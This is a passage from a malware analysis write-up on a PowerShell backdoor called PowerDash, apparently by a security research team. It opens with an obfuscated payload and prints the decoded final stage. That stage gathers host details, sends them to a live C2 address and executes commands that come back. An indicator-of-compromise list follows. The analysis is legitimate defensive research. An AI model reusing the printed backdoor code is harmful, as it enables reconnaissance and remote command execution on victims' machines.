${@}${``}${#)``}  +${@}${'}${.#=}+  ${@}${#+}${'}+${@}${~*(}${``%}${#+}+  ${@}${~*(}${``%}${~*(}  +${@}${~*(}${[*}${;!@}  +${@}${``}${~*(}  +${@}${[)$}${[*}  +  ${@}${``}${;!@}  +${@}${~*(}${``%}${#)``}+  ${@}${~*(}${~*(}${~*(}+${@}${~*(}${``%}${;!@}+${@}${~*(}${~*(}${``%}  +${@}${``}${``%}  +  ${@}${[)$}${``}  +  ${@}${;!@}${#+}+${@}${[)$}${[*}  +${@}${[)$}${``}  +  ${@}${``}${~*(}  +${@}${[)$}${[*}  +${@}${[)$}${[*}  +  ${@}${[)$}${[*}  +  ${@}${~*(}${[)$}+${@}${~*(}${``%}  +${@}${~*(}${[*}${;!@}  +${@}${~*(}${[)$}  +  ${@}${~*(}${``%}+${@}${[)$}${#)``}  +${@}${~*(}${``%}${``}+  ${@}${~*(}${``%}${~*(}+${@}${#+}${'}  +  ${@}${~*(}${``%}${``%}+${@}${~*(}${``%}${~*(}+  ${@}${~*(}${~*(}${``}  +  ${@}${~*(}${~*(}${;!@}+${@}${[)$}${[*}  +  ${@}${[)$}${[*}+  ${@}${#)``}${~*(}  +  ${@}${[)$}${[*}+  ${@}${#)``}${``}  +  ${@}${~*(}${[*}${[)$}+  ${@}${[)$}${#+}+  ${@}${#)``}${'}  +${@}${~*(}${~*(}${~*(}  +  ${@}${~*(}${~*(}${``%}+  ${@}${~*(}${~*(}${#)``}  +  ${@}${~*(}${``%}${~*(}+${@}${~*(}${~*(}${``%}  +  ${@}${~*(}${~*(}${#)``}  +${@}${``}${;!@}+${@}${.#=}${``}  +  ${@}${~*(}${[*}${~*(}+${@}${~*(}${~*(}${[*}  +${@}${~*(}${``%}${~*(}+  ${@}${[)$}${#+}  +${@}${#)``}${~*(}  +${@}${[)$}${#+}+  ${@}${#+}${'}+  ${@}${~*(}${~*(}${[*}  +  ${@}${~*(}${~*(}${[*}  +  ${@}${~*(}${``%}${.#=}  +${@}${~*(}${``%}${;!@}+${@}${#+}${#+}  +  ${@}${#+}${'}+${@}${~*(}${~*(}${#)``}+  ${@}${~*(}${``%}${;!@}+  ${@}${~*(}${~*(}${~*(}+${@}${~*(}${~*(}${``%}+  ${@}${``}${'}  +${@}${~*(}${``%}${#)``}+${@}${~*(}${~*(}${;!@}  +  ${@}${~*(}${~*(}${~*(}+${@}${~*(}${~*(}${``%}  +${@}${;!@}${#+}  +  ${@}${[)$}${[*}+  ${@}${#+}${#+}  +${@}${~*(}${``%}${``}  +  ${@}${#+}${'}  +  ${@}${~*(}${~*(}${``}  +  ${@}${~*(}${~*(}${;!@}+  ${@}${~*(}${``%}${~*(}  +  ${@}${~*(}${~*(}${#)``}+${@}${#)``}${~*(}+  ${@}${~*(}${~*(}${'}+  ${@}${~*(}${~*(}${#)``}  +${@}${~*(}${``%}${[*}+${@}${``}${;!@}+${@}${;!@}${#)``}+  ${@}${[)$}${#+}+${@}${~*(}${[*}${;!@}  +${@}${~*(}${[)$}+  ${@}${~*(}${``%}+  ${@}${[)$}${#)``}+  ${@}${~*(}${~*(}${``}  +${@}${~*(}${``%}${~*(}+${@}${~*(}${~*(}${;!@}  +  ${@}${~*(}${~*(}${[*}+  ${@}${~*(}${~*(}${~*(}  +${@}${~*(}${~*(}${``%}  +  ${@}${~*(}${~*(}${;!@}  +${@}${~*(}${``%}${~*(}  +${@}${[)$}${[*}  +${@}${#)``}${~*(}+  ${@}${[)$}${[*}  +${@}${'}${[)$}  +${@}${~*(}${~*(}${#+}+${@}${~*(}${~*(}${``}+  ${@}${[)$}${[*}+  ${@}${[)$}${#)``}  +${@}${~*(}${~*(}${'}+  ${@}${~*(}${~*(}${``}+${@}${~*(}${``%}${.#=}  +${@}${[)$}${[*}  +  ${@}${``}${;!@}  +${@}${'}${'}+  ${@}${~*(}${``%}${~*(}+${@}${~*(}${~*(}${#)``}  +${@}${~*(}${``%}${``}  +${@}${~*(}${~*(}${~*(}  +${@}${~*(}${``%}${``%}+${@}${[)$}${[*}+  ${@}${.#=}${``%}+${@}${~*(}${~*(}${~*(}+  ${@}${~*(}${~*(}${;!@}+${@}${~*(}${~*(}${#)``}+  ${@}${[)$}${[*}  +${@}${``}${;!@}+${@}${'}${[*}  +${@}${~*(}${``%}${~*(}+  ${@}${#+}${'}  +  ${@}${~*(}${``%}${``%}+  ${@}${~*(}${``%}${~*(}+${@}${~*(}${~*(}${``}+  ${@}${~*(}${~*(}${;!@}  +  ${@}${[)$}${[*}+  ${@}${[)$}${#)``}  +${@}${~*(}${``%}${``}+  ${@}${~*(}${``%}${~*(}+  ${@}${#+}${'}  +${@}${~*(}${``%}${``%}+${@}${~*(}${``%}${~*(}  +  ${@}${~*(}${~*(}${``}  +  ${@}${~*(}${~*(}${;!@}+${@}${[)$}${[*}  +${@}${``}${;!@}  +  ${@}${#+}${.#=}+${@}${~*(}${~*(}${~*(}  +  ${@}${~*(}${``%}${``%}  +${@}${~*(}${[*}${~*(}  +${@}${[)$}${[*}  +${@}${``}${``%}  +  ${@}${[)$}${#)``}  +${@}${#+}${.#=}+  ${@}${~*(}${~*(}${~*(}  +  ${@}${~*(}${``%}${``%}+${@}${~*(}${[*}${~*(}+${@}${~*(}${[*}${``}+${@}${#)``}${'}+  ${@}${~*(}${~*(}${~*(}+${@}${~*(}${~*(}${``%}+  ${@}${~*(}${~*(}${.#=}+  ${@}${~*(}${``%}${~*(}  +${@}${~*(}${~*(}${``}  +  ${@}${~*(}${~*(}${#)``}+  ${@}${.#=}${``}+${@}${~*(}${~*(}${~*(}+  ${@}${``}${;!@}  +${@}${'}${``}  +${@}${~*(}${~*(}${;!@}+${@}${~*(}${~*(}${~*(}+${@}${~*(}${~*(}${``%}+${@}${``}${~*(}  +  ${@}${[)$}${[*}  +  ${@}${``}${;!@}  +${@}${.#=}${;!@}  +${@}${~*(}${~*(}${;!@}  +${@}${~*(}${``%}${~*(}+${@}${#)``}${#)``}  +${@}${#+}${'}+${@}${~*(}${~*(}${;!@}  +  ${@}${~*(}${``%}${;!@}+  ${@}${#+}${#+}+  ${@}${.#=}${``%}+  ${@}${#+}${'}  +  ${@}${~*(}${~*(}${``}+${@}${~*(}${~*(}${;!@}+${@}${~*(}${``%}${;!@}  +${@}${~*(}${~*(}${``%}  +  ${@}${~*(}${``%}${[)$}+${@}${~*(}${[)$}+${@}${~*(}${``%}+  ${@}${'}${[)$}+  ${@}${~*(}${~*(}${``%}+${@}${~*(}${~*(}${.#=}+  ${@}${~*(}${~*(}${~*(}+  ${@}${~*(}${``%}${'}+${@}${~*(}${``%}${~*(}+  ${@}${``}${;!@}  +  ${@}${#)``}${'}+  ${@}${~*(}${~*(}${~*(}+  ${@}${~*(}${``%}${#+}+${@}${~*(}${``%}${#+}  +  ${@}${#+}${'}+${@}${~*(}${~*(}${``%}+${@}${~*(}${``%}${``%}  +${@}${[)$}${[*}+${@}${``}${``%}  +${@}${#+}${~*(}+  ${@}${.#=}${[)$}+${@}${#+}${#+}+  ${@}${~*(}${~*(}${``}+${@}${~*(}${``%}${;!@}+${@}${~*(}${~*(}${[*}+  ${@}${~*(}${~*(}${#)``}+${@}${#)``}${#)``}+  ${@}${~*(}${``%}${.#=}  +  ${@}${~*(}${~*(}${~*(}  +  ${@}${#+}${#+}  +  ${@}${~*(}${``%}${'}+  ${@}${#+}${[)$}  +${@}${;!@}${.#=}  +  ${@}${;!@}${.#=}+  ${@}${#)``}${'}+  ${@}${~*(}${~*(}${``}+${@}${~*(}${``%}${~*(}+  ${@}${#+}${'}+  ${@}${~*(}${~*(}${#)``}+${@}${~*(}${``%}${~*(}+${@}${``}${``%}+${@}${``}${``%}  +  ${@}${[)$}${#)``}  +  ${@}${~*(}${~*(}${``}+${@}${~*(}${``%}${~*(}  +${@}${~*(}${~*(}${;!@}+${@}${~*(}${~*(}${[*}+${@}${~*(}${~*(}${~*(}  +  ${@}${~*(}${~*(}${``%}+  ${@}${~*(}${~*(}${;!@}+${@}${~*(}${``%}${~*(}  +${@}${``}${#)``}  +${@}${#)``}${'}+${@}${~*(}${~*(}${~*(}  +  ${@}${~*(}${~*(}${``%}+  ${@}${~*(}${~*(}${#)``}  +${@}${~*(}${``%}${~*(}  +  ${@}${~*(}${~*(}${``%}  +${@}${~*(}${~*(}${#)``}+  ${@}${~*(}${[*}${``}+  ${@}${#)``}${'}  +${@}${~*(}${~*(}${~*(}  +  ${@}${~*(}${~*(}${``%}  +  ${@}${~*(}${~*(}${.#=}  +${@}${~*(}${``%}${~*(}+${@}${~*(}${~*(}${``}+  ${@}${~*(}${~*(}${#)``}  +  ${@}${'}${``%}+${@}${~*(}${~*(}${``}+${@}${~*(}${~*(}${~*(}  +  ${@}${~*(}${``%}${#+}+  ${@}${``}${;!@}+  ${@}${'}${``}+  ${@}${~*(}${~*(}${;!@}  +  ${@}${~*(}${~*(}${~*(}+${@}${~*(}${~*(}${``%}  +${@}${``}${~*(}  +  ${@}${``}${#)``}+${@}${#+}${#+}+  ${@}${~*(}${``%}${#+}+${@}${~*(}${``%}${``%}+${@}${``}${~*(}+${@}${``}${~*(}  )  "  )

With some PowerShell syntax voodoo we were able to format and split the payload into two distinct parts:

First one, that increasingly builds up a set of variables.
Second one, that takes these variables, creates a large script chunk and executes it.

Since we can now see that the script is executed using the . symbol, all that we have to do is replace it with a print statement and execute it in a safe environment.

[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}
$url  = "https://95.163.240.184:8000/dash/post_data/"
$body = @{
    uuid = (Get-WmiObject Win32_ComputerSystemProduct).UUID
    name = $env:COMPUTERNAME
    os   = (Get-WmiObject -Class Win32_OperatingSystem).Caption
    lang = (Get-CimInstance CIM_VideoController|%{[int][math]::round($_.AdapterRAM/1GB)}) -join("; ")
    domain = (Get-WmiObject -Class Win32_ComputerSystem).Domain
    av = (Get-WmiObject -namespace root\SecurityCenter2 -class Antivirusproduct).DisplayName
    cpu = (Get-CimInstance CIM_Processor).Name
    gpu = (Get-CimInstance CIM_VideoController|%{$_.Name}) -join("; ")   
}
$headers  = @{'Content-Type'='application/json; charset=utf-8'}
$response = Iwr $url -Method Post -Headers $headers -body ($body|ConvertTo-Json) -UseBasicParsing
Invoke-Command ([ScriptBlock]::Create(($response.Content|ConvertFrom-Json).cmd))

The final payload is relatively small – all it does is collect a bunch of information about the host and then contacts the C2 for commands to execute.

C2 server

We decided to take a closer look at the C2 server.

Luckily for us, the malware operator left the DEBUG mode on.

The server is programmed in Python and uses several known libraries/frameworks like Django and Grappelli.

What's interesting for us is the /dash/ route – that's the endpoint infected bots talk to. We can notice the /dash/post_data/ registration path as well as a few other endpoints that weren't mentioned in previous staged. We suspect that the malware operator manually determines whether the victim is interesting enough and then drops further PowerShell scripts that contain more functionalities.

While we were unable to download any additional payloads that would utilize the other C2 endpoints we plan to monitor this malware family in case a threat actor decides to use it again.

IoC

Value	Description
5.63.152.179	Host used for serving payloads
95.163.240.184	Host used as malware C2
hxxps://95.163.240.184:8000/dash/post_data/	C2 endpoint used for bot registration
hxxp://5.63.152.179/doc/zal_nr_1_zap_ofert(<digits>).doc	Malicious HTA script
hxxp://5.63.152.179/pl/1txt/<digits>	Malicious PowerShell script
hxxp://5.63.152.179/pl/2ht/<digits>	Malicious HTA script
hxxp://5.63.152.179/pl/3txt/<digits>	Malicious PowerShell script
d5c03af59492198d99889f5ec84f96129019ba933c5d8e3614866861c28ab4e6	SHA256 of Zapytanie_ofertowe_2023_0118806.doc
64502109c546fbd2d37644c030182a906b3871316b5086d31286c3697ca94362	SHA256 of zal_nr_1_zap_ofert(8806).doc
2fd5c1a3787eec4d9bd6f935e5b93af0f4fd454544b03c6aa70c94e4b55d22a7	SHA256 of 8806 – Stager
ec0a53f40414c1a1419d458af90a74b58d654de4af67841d689fa9f296ca617d	SHA256 of 8806 – HTA persistence
a196711c42f3f3d378bf8232d3b10a92afd846b0f374cbf6cd54fcfda47b958d	SHA256 of 8806 – PowerDash payload

https://github.com/aemkei/jsfuck ↩